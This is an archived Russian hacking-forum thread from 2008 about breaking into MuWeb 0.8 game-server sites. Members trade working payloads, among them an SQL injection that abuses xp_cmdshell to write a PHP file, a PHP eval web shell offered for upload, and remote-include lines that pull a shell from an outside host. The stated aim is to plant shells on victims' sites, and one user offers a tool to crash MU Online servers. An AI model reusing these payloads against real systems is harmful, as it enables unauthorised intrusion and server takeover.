PDA

Просмотр полной версии : [Видео] Взлом MuWeb 0.8

Ponchik
26.05.2008, 22:28
Кто хочет читать всё что я там писал готовьтесь жмакать на кнопку pause :)

http://www.sharemania.ru/0226098

Видео от части навеяно вопросами в ПМ как я залил шелл в своём прошлом видео, вот вам ответ, показал не все дыры, но вам хватит :)
P.S.Видео не выкладывают в video.antichat.ru по ходу это уже никаму ненужная бага, тему в принцепе можно сносить
Dimi4
26.05.2008, 23:15
Молодец пончик. Так держать. Может и в моа возьмут :)
Ronny
16.06.2008, 16:55
Кто хочет читать всё что я там писал готовьтесь жмакать на кнопку pause :)

http://www.sharemania.ru/0226098

Видео от части навеяно вопросами в ПМ как я залил шелл в своём прошлом видео, вот вам ответ, показал не все дыры, но вам хватит :)
P.S.Видео не выкладывают в video.antichat.ru по ходу это уже никаму ненужная бага, тему в принцепе можно сносить

Ета команда показавает всю инфу о ПХП :
'; USE Master exec xp_cmdshell 'echo "<?php phpinfo(); ?>" > C:\AppServ\www\shell.php';--

А что надо прописать, чтобы отсюда -> http://globnet.oo.lv/shell.php загрузить шелл на сайт жертвы ???
Ponchik
17.06.2008, 12:23
Я всегда нелюбил людей которые тупо повторяют то что видят, нужно свои мозги иметь! Хотя чё я ждал снимая это видео, конечно привалят имено такие...
В общем заливай <? stripslashes(eval($_GET[c])); ?> но stripslashes() не всегда надо, не везде экранирование, но на 90% серваках, а дальше тебе палюбому надо знать PHP, скачай книгу "самоучитель по PHP" и пачитай, там дальше поймёш
NooB1k
17.06.2008, 12:38
Круто. 10\10. Можно вопрос я За шол на какойто му в админку сам узнал как заходить не повторял как у тебя.Когда я хочу что там сменит меня снова выкидывает в админку в начало и не меняется,что делать? обращаюсь к тебе т.к ты понимаешь в этом деле.
Sn@k3
17.06.2008, 12:56
ну впринцыпе ничего фантастического, но вопрос, как ты нашел багу, где в админку не пускает тупо только алертом =)))) за это молодец.
Ronny
17.06.2008, 16:51
Я всегда нелюбил людей которые тупо повторяют то что видят, нужно свои мозги иметь! Хотя чё я ждал снимая это видео, конечно привалят имено такие...
В общем заливай <? stripslashes(eval($_GET[c])); ?> но stripslashes() не всегда надо, не везде экранирование, но на 90% серваках, а дальше тебе палюбому надо знать PHP, скачай книгу "самоучитель по PHP" и пачитай, там дальше поймёш

Ну вот...как ето понять
<? stripslashes(eval($_GET[c])); ?>

Тут понятнее
'; USE Master exec xp_cmdshell 'echo "<?php phpinfo(); ?>" > C:AppServ/www/shell.php;--

C:AppServ/www/shell.php понятно куда заливаешь, и в какой фаил :)

"<? stripslashes(eval($_GET[c])); ?>" > C:AppServ/www/shell.php;--
может быть так :confused: и куда свой сайт вписовать (откуда шелл закачивать надо) ?
NooB1k
18.06.2008, 13:01
Ronny,тебе сказали уже куда и как,я всё понял с 1 раза.Хоть я это не знал!
Ronny
19.06.2008, 15:03
Ну может обясниш...мне тупому человеку ???
NooB1k
19.06.2008, 18:13
<? stripslashes(eval($_GET[c])); ?> stripslashes()
NooB1k
19.06.2008, 18:28
Рони кстати у меня есть прога он сервер muonline сносит в миг!могу скинуть дай асю
Ronny
19.06.2008, 19:44
:d ето я понял...а мне же нужно шелл с сайта загрузить...
- Скажи куда сылку вписовать, раз ты такой Умный :d
ICQ - 387777909
SanyaX
19.06.2008, 21:19
<?php include ("www.site.com/shell.php"); ?>
А всё таки лучше не много подчитай, чтобы понятнее было.
Ronny
20.06.2008, 09:27
'; USE Master exec xp_cmdshell 'echo "<?php include ("www.site.com/shell.php"); ?>" > C:AppServwwwshell.php;--
Ето должно получиться ?

или просто вписовать ?
<?php include ("www.site.com/shell.php"); ?>
NooB1k
20.06.2008, 16:29
Ronny похоже
Ronny
22.06.2008, 20:29
<? stripslashes(eval($_GET[c])); ?> stripslashes(http://globnet.oo.lv/shell/shell.txt)

ТАК ????